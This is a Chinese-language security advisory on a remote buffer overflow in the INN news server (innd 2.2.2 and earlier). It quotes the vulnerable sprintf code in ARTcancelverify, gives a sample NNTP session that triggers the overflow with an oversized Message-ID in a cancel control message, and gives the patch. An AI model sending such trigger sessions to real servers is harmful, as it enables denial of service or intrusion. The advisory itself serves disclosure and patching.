漏 洞 描 述:

　　Newest innd 2.2.2是一个很普遍的新闻服务器软件,innd 2.2.2(包括更早的版本）存在一个远程溢出漏洞。问题出在innd/art.c的函数ARTcancelverify:

if (!EQ(local, p)) {
files = NULL;
(void)sprintf(buff, "\"%.50s\" wants to cancel %s by \"%.50s\"",
p, MessageID, local);
ARTlog(Data, ART_REJECT, buff);
}

　　其中的buff有256个字节长,但是MessageID能达到1000个字节以上.当向一个特定的新闻组发送"cancel request",并且"cancel request"包含有效的Message-ID,这段代码就会起作用。


测试防范如下:

201 XXX InterNetNews NNRP server INN 2.2 23-Oct-1998 ready (posting ok)
mode reader
group pl.test
post
Message-ID: $#@60;none@LONGBUFFER$#@62;
From: $#@60;test@polbox.com$#@62;
Sender: $#@60;test@polbox.com$#@62;
Newsgroups: pl.test

testing
. $#@60;- single dot, comment to avoid mail transfer problems
group control
post
Message-ID: $#@60;some-random-msgid@test.pl$#@62;
Approved: $#@60;approver@approving.net$#@62;From: $#@60;sucker@free.net.pl$#@62;
Sender: $#@60;sucker@free.net.pl$#@62;
Control: cancel $#@60;none@LONGBUFFER$#@62;
Subject: cmsg cancel $#@60;none@LONGBUFFER$#@62;
Newsgroups: control

Damn, cancel it.
. $#@60;- single dot
quit


　　注意:只有在inn.conf里的verifycancel设置为"enabled"才被执行.缺省情况下 "verifycancels" 设为disable。

解 决 方 法:

补丁程序如下：
--- inn/innd/art.c 2000/06/05 22:39:52 1.142
+++ inn/innd/art.c 2000/06/06 19:31:56 1.143
@@ -1042,7 +1042,7 @@
HeaderCleanFrom(p);
if (!EQ(q, p)) {
token = NULL;
- (void)sprintf(buff, "\"%.50s\" wants to cancel %s by \"%.50s\"",
+ (void)sprintf(buff, "\"%.50s\" wants to cancel %.70s by \"%.50s\"",
p, MessageID, q);
ARTlog(Data, ART_REJECT, buff);
}